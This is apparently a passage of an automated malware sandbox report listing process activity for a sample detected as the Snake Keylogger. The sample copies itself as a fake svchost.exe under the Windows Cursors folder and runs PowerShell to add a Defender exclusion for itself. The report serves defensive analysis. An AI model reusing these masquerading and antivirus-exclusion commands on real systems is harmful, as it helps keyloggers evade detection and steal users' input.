                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: cmd.exe PID: 3984 Parent PID: 2788

                                                        General

                                                        Start time:11:02:03
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                        Imagebase:0xbd0000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: conhost.exe PID: 5816 Parent PID: 3984

                                                        General

                                                        Start time:11:02:03
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6b2800000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: svchost.exe PID: 6216 Parent PID: 568

                                                        General

                                                        Start time:11:02:04
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                        Imagebase:0x7ff7488e0000
                                                        File size:51288 bytes
                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: timeout.exe PID: 6248 Parent PID: 3984

                                                        General

                                                        Start time:11:02:04
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:timeout 1
                                                        Imagebase:0xee0000
                                                        File size:26112 bytes
                                                        MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: svchost.exe PID: 6528 Parent PID: 3388

                                                        General

                                                        Start time:11:02:11
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe'
                                                        Imagebase:0xf50000
                                                        File size:46080 bytes
                                                        MD5 hash:0802967C1D72DEEB4E1B79AF74FDB553
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000011.00000002.517681508.0000000004965000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000011.00000002.517681508.0000000004965000.00000004.00000001.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 29%, ReversingLabs
                                                        Reputation:low

                                                        Analysis Process: svchost.exe PID: 6624 Parent PID: 568

                                                        General

                                                        Start time:11:02:15
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                        Imagebase:0x7ff7488e0000
                                                        File size:51288 bytes
                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: svchost.exe PID: 6672 Parent PID: 568

                                                        General

                                                        Start time:11:02:16
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                        Imagebase:0x7ff7488e0000
                                                        File size:51288 bytes
                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Analysis Process: svchost.exe PID: 6712 Parent PID: 568

                                                        General

                                                        Start time:11:02:17
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                        Imagebase:0x7ff7488e0000
                                                        File size:51288 bytes
                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        Analysis Process: lfQuSBwdSf.exe PID: 6864 Parent PID: 2788

                                                        General

                                                        Start time:11:02:19
                                                        Start date:08/04/2021
                                                        Path:C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Imagebase:0x7d0000
                                                        File size:46080 bytes
                                                        MD5 hash:0802967C1D72DEEB4E1B79AF74FDB553
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000015.00000002.485923538.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000015.00000002.485923538.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                        Analysis Process: svchost.exe PID: 6872 Parent PID: 568

                                                        General

                                                        Start time:11:02:19
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                        Imagebase:0x7ff7488e0000
                                                        File size:51288 bytes
                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        Analysis Process: svchost.exe PID: 6908 Parent PID: 3388

                                                        General

                                                        Start time:11:02:20
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe'
                                                        Imagebase:0x640000
                                                        File size:46080 bytes
                                                        MD5 hash:0802967C1D72DEEB4E1B79AF74FDB553
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000017.00000002.541864387.0000000004A72000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.541864387.0000000004A72000.00000004.00000001.sdmp, Author: Joe Security

                                                        Analysis Process: svchost.exe PID: 6932 Parent PID: 568

                                                        General

                                                        Start time:11:02:20
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                        Imagebase:0x7ff7488e0000
                                                        File size:51288 bytes
                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        Analysis Process: svchost.exe PID: 7064 Parent PID: 568

                                                        General

                                                        Start time:11:02:21
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                        Imagebase:0x7ff7488e0000
                                                        File size:51288 bytes
                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Analysis Process: svchost.exe PID: 7152 Parent PID: 568

                                                        General

                                                        Start time:11:02:22
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                        Imagebase:0x7ff7488e0000
                                                        File size:51288 bytes
                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        Analysis Process: WerFault.exe PID: 6164 Parent PID: 2788

                                                        General

                                                        Start time:11:02:24
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 2300
                                                        Imagebase:0xa40000
                                                        File size:434592 bytes
                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET

                                                        Analysis Process: svchost.exe PID: 1648 Parent PID: 568

                                                        General

                                                        Start time:11:02:29
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                        Imagebase:0x7ff7488e0000
                                                        File size:51288 bytes
                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Analysis Process: powershell.exe PID: 4424 Parent PID: 6908

                                                        General

                                                        Start time:11:02:47
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                                                        Imagebase:0xb0000
                                                        File size:430592 bytes
                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET

                                                        Analysis Process: conhost.exe PID: 2120 Parent PID: 4424

                                                        General

                                                        Start time:11:02:47
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6b2800000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Analysis Process: powershell.exe PID: 5092 Parent PID: 6908

                                                        General

                                                        Start time:11:02:48
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                                                        Imagebase:0xb0000
                                                        File size:430592 bytes
                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET

                                                        Analysis Process: conhost.exe PID: 5136 Parent PID: 5092

                                                        General

                                                        Start time:11:02:48
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6b2800000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Analysis Process: powershell.exe PID: 3348 Parent PID: 6908

                                                        General

                                                        Start time:11:02:49
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                                                        Imagebase:0xb0000
                                                        File size:430592 bytes
                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET

                                                        Analysis Process: conhost.exe PID: 5224 Parent PID: 3348

                                                        General

                                                        Start time:11:02:50
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6b2800000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Analysis Process: svchost.exe PID: 5232 Parent PID: 568

                                                        General

                                                        Start time:11:02:50
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                        Imagebase:0x7ff7488e0000
                                                        File size:51288 bytes
                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >